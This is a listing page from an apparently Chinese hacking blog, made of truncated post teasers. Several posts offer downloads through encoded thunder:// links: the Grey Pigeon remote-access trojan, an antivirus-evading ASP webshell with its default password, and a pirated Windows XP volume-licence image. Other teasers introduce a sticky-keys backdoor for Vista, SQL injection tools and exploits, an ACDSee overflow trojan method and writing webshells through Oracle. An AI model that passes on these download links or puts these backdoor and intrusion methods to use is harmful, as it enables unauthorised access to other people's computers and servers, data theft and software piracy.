popphen.net.ru
预览模式: 普通 | 列表

Windows XP with SP3 VOL MSDN┊种子下载/解决众多BUG也改进稳定┊简体中文版

Windows XP Professional with Service Pack 3 (x86) - CD (Chinese-Simplified)
zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070

[阅读全文]

标签: XP SP3 VOL MSDN

灰鸽子vip2008正版

 

灰鸽子vip2008正版是通过灰鸽子工作室vip2007正版的基础上改进的,
软件通过改进,可以不需要

输入帐号和密码即可享受正版的免费服务

下载地址:
thunder://QUFodHRwOi8vZHh4ejIwLmhhY2s1OC5jb206NTg1OS9oYWNrNTgvc2t5LzA4NTJnei5yYXJaWg==


声明!该软件性质是木马类 所以使用该软件的一切后果
与本博客无

[阅读全文]

灰鸽子VIP2008黑客动画吧专版

灰鸽子VIP2008黑客动画吧专版

由于软件加了加了壳!所以杀毒软件会报毒
【Backdoor.Win32.Agent.bac】如果怕是后门者请立即删除!

 另付病毒报告一张! 各位大侠可以检查!


下载地址:thunder://QUFodHRwOi8vZHh4ejIwLmhhY2s1OC5jb206NTg1OS9oYWNrNTgvc2t5LzA4NTJrai5yYXJaWg==

由于该软件性

[阅读全文]

黑吧专版ASP木马

界面完全仿黑客动画吧首页模式
免杀过全世界杀毒软件
Serv-u通杀所有版本
Alexa排名查询
增加用户 可直接从服务器以SYSTEM权限建立用户
整站打包功能加以提速
直接下载,可直接从网站下载文件到WEBSHELL

默认密码为:hack58

本文件由网友发布,请自行解密测试后门
 
下载地址:
thunder://QUFodHRwOi8vZHh4ejIwLmhhY2s1OC5jb206

[阅读全文]

php+mysql 5 sql injection 暴取工具beta版

文章作者:mika
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

mysql出来5版本以后,注入漏洞要比以前更容易利用了,也可以像mssql那样直接暴取了(甚至比mssql更容易了,因为mssql暴取是需要错误提示开启的,如果错误提示关闭的话,是需要暴力猜解的,而mysql的只要你找准注入点只要可以union出任何一个字段能在页面显示出来就可以了)。自从读了flyh4t的文

[阅读全文]

标签: php mysql

粘滞键打造入侵Vista系统爆酷后门

来源:天阳
什么是粘滞键?
  当你在Windows操作系统里面连续按下5次Shift键之后,你看看出来了什么?
  在windows 2000/xp/Vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
  一、具体的替换方法:
  XP系统:
  将安装

[阅读全文]

脚本安全的本质 PHP+MYSQL

一  前言    问题的存在

    从代码级别上,也就是应用层次上考虑代码安全的话(也就是不考虑底层的语言本身等问题的漏洞),脚本安全问题就是函数和变量的问题。变量直接或者间接的接收用户不安全的的输入,由于php本身的特性,在php中更容易发现这种变量的混乱(很多php程序都用来定义以及初始化以及接收变量,可以直接在程序中使用$

[阅读全文]

标签: 脚本 PHP MYSQL

从ACDSee的漏洞看木马入侵新思路

来源:中关村在线

对于ACDSee的大名,想必各位都不陌生。不过最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在处理XBM/XPM/PSP/LHA文件时出现缓冲区溢出漏洞,如果用户打开了带有超长字符串的XBM/XPM/PSP/LHA文件的话,就可能触发这些溢出,导致执行任意指令。

    本次提到的漏洞

[阅读全文]

OBlog (tags.asp) Remote SQL Injection Exploit

官方已经修正该漏洞。

–==+=================== www.nspcn.org =================+==–
–==+ OBlog (tags.asp) Remote SQL Injection Exploit +==–
–==+=======================================

[阅读全文]

标签: OBlog SQL

ORACLE 本地读写文件---ORA WRITE WEBSHELL

 
一般我们通过函数注射以后 获得ORA的DBA权限   那么我们就得对本地文件进行操作!

要是WEB跟ORA是同一个机器~那就更方便于我们拿更多的权限了~或者对本地写webshell

下面是采用ORA 自带的文件访问包 操作本地文件! 前提是你必须要知道WEBSITE的物理地址

以下是一个简单例子

--首先我们得先建立一个  ORACLE的目录对象

[阅读全文]

标签: WEBSHELL